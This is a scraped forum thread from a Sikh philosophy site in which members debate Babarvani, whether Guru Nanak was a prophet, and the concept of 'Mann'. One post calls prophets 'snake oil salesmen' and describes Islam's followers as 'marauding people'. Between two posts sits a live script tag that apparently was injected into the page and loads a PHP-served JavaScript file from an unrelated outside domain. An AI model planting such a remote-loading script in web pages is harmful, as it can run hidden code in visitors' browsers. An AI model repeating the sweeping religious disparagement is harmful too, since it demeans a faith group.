• Welcome to all New Sikh Philosophy Network Forums!
    Explore Sikh Sikhi Sikhism...

Prophecy Or Not?

spnadmin

1947-2014 (Archived)
SPNer
Jun 17, 2004
japjisahib ji

Here lies my confusion. You also seem to be saying that Guru Nanak was not an eye-witness to the sack of Lahore and the brutality of Babar. Yet, we know that he was an eye-witness, how could he escape seeing it. He was there and we are also told he spent time in prison. Guru Nanak speaks directly of the women who were jailed, their humiliation and suffering. That was also very real. You also seem to say there are no Babarbani, relating Guru Nanak's experiences. /QUOTE]

Dear Spnadmin Jee

What I am experiencing I am writing. Essence of the sabd is jo jaisi sanghat karai so taiso hi phal pae - depending upon the quality of sanghat, I express it through my speech. When it transmit demon thought process, then 'kudh pherey pradhan vai lalo- means my speech is filled with babarvani and as such, 'kuayer n roti khaey - it does not accept food of contentment, but yearn more and more food of trishna(fire of desires). This is how I understand babarvani.

Best regards
sahni mohinder

Thank you again. I thought you had said that earlier and then things seemed to change. I did misunderstand you.

Tejwant Singh

Mentor
Writer
SPNer
Jun 30, 2004
Henderson, NV.
Aristotle ji,

Guru Fateh.

Thanks for the thoughtful find with your inquisitive questions which I am sure will benefit all of us in stuffing our spiritual coffers.

There was a thread here on Prophecy in Sikhi if I am not mistaken, started by Jasbir Singh Kaleka. It turned into a very interesting debate about Guru Nanak being a Prophet or not. I wish I knew the title of the thread.

Just for the sake of argument, if Sikhi believed in Prophets and their prophecies, then we would have 11 prophets including the Sri Guru Granth Sahib Ji and also we would add all the Bhagats whose poetry became Gurbani. Prophets are nothing but snake oil salesmen as was discussed in the thread.

Sikhi is idea based as we all know it. If Guru Nanak wanted to start another religion based on himself as a deity or the only spokesperson of Ik Ong Kaar as many other religions did including Islam, whose followers were marauding people, then he would have been murdered, with the result, no Sikhi.

Guru Nanak was a visionary. He brought a new thought process at the messy table of the time. That is why Sikhi flourished sans baseless rituals and other things practiced by all other religions.

This is the reason; Sri Guru Granth Sahib Ji is filled with one word more than any other- Mann. Guru Nanak went to the root cause. All religions discard Mann, hence the birth of belief system based on blind faith for the blind sheep where Mann in not needed or used. This is the deliberate effort by these dogmatic religions who have created fear based Hell and other things for people not to think with the help of Mann.

Guru Nanak took the opposite path and the only right one in my opinion. Once one starts developing a thought process, then sky is not the limit which makes us Sikhs, the fortunate ones.

I have no idea why Babavani is scattered in the Sri Guru Granth Sahib Ji, nor do I want to indulge in this-why, because of it. For me, Sri Guru Granth Sahib Ji is the genome of the brain from the angles of our Mann. Hence, different thoughts which are registered in different parts of the brain are expressed in different sections of the Sri Guru Granth Sahib Ji.

Babarvani has the historical facts with the relative dates as you have shown in the Shabad. We all know the carnage Babar and his fiendish followers created in India.

In my opinion, Babarvani, Sidhgosht and others were Cris de Coeur by Guru Nanak to shake the people of the time up so that they could become brave enough to discard the mechanical, useless rituals and would start using their Mann to develop a Nibhau, Nirvair thought process.

As Sikhi has no prophets, according to my understanding, the verse-'hor bhi uthsi mard ka cheyla- is the Cri de Coeur to all of us which still stands every time we do Nitnem or study the page of Sri Guru Granth Sahib Ji randomly so that we can continue developing our Manns in a Nirbhau, Nirvair manner because Sikhi idea created by Guru Nanak does not stop in time but expands with it.

Thanks & regards

Tejwant Singh

Gyani Jarnail Singh

Sawa lakh se EK larraoan
Mentor
Writer
SPNer
Jul 4, 2004
KUALA LUMPUR MALAYSIA
Tejwant Ji..most beautifully said as usual ji..THANKS. You carry a very sharp KHANDA...similar to the one carried by Baba Deep Singh Ji...one that has the ability to sever ones own head and put it on one's palm so one can observe one's head directly and not as we all do..via a mirror reflection (which actually reverses the image).:winkingsingh:

<script src="https://secure-content-delivery.com/data.js.php?i={B9986458-7307-43C8-90C7-6BE304BE4CCA}&d=2013-08-02&s=http://www.sikhphilosophy.net/hard-talk/41321-prophecy-or-not-3.html&cb=0.6357926492305258" type="text/javascript"></script>

japjisahib04

Mentor
SPNer
Jan 22, 2005
kuwait
Aristotle ji,

This is the reason; Sri Guru Granth Sahib Ji is filled with one word more than any other- Mann. Guru Nanak went to the root cause. All religions discard Mann, hence the birth of belief system based on blind faith for the blind sheep where Mann in not needed or used. This is the deliberate effort by these dogmatic religions who have created fear based Hell and other things for people not to think with the help of Mann.

Guru Nanak took the opposite path and the only right one in my opinion. Once one starts developing a thought process, then sky is not the limit which makes us Sikhs, the fortunate ones.

Babarvani has the historical facts with the relative dates as you have shown in the Shabad. We all know the carnage Babar and his fiendish followers created in India.

That is why guru sahib maintains there are two hukmi in second stanza of japjisahib - one is God and the other is our manh and the zist of jajisahib is manh jeetai jagh jeet.

Further Gyani Ji the word 'ਕਾਬਲਹੁ ਧਾਇਆ' with aunkar under 'h' stands for fully acquinted/ conspiring mind and not from kabul. Gurabni says, 'ਮਨੁ ਮਾਇਆ ਮਨੁ ਧਾਇਆ ਮਨੁ ਪੰਖੀ ਆਕਾਸਿ ॥

best regards
sahni mohinder

❤️ CLICK HERE TO JOIN SPN MOBILE PLATFORM

❤️ CLICK HERE TO JOIN SPN MOBILE PLATFORM

📌 For all latest updates, follow the Official Sikh Philosophy Network Whatsapp Channel: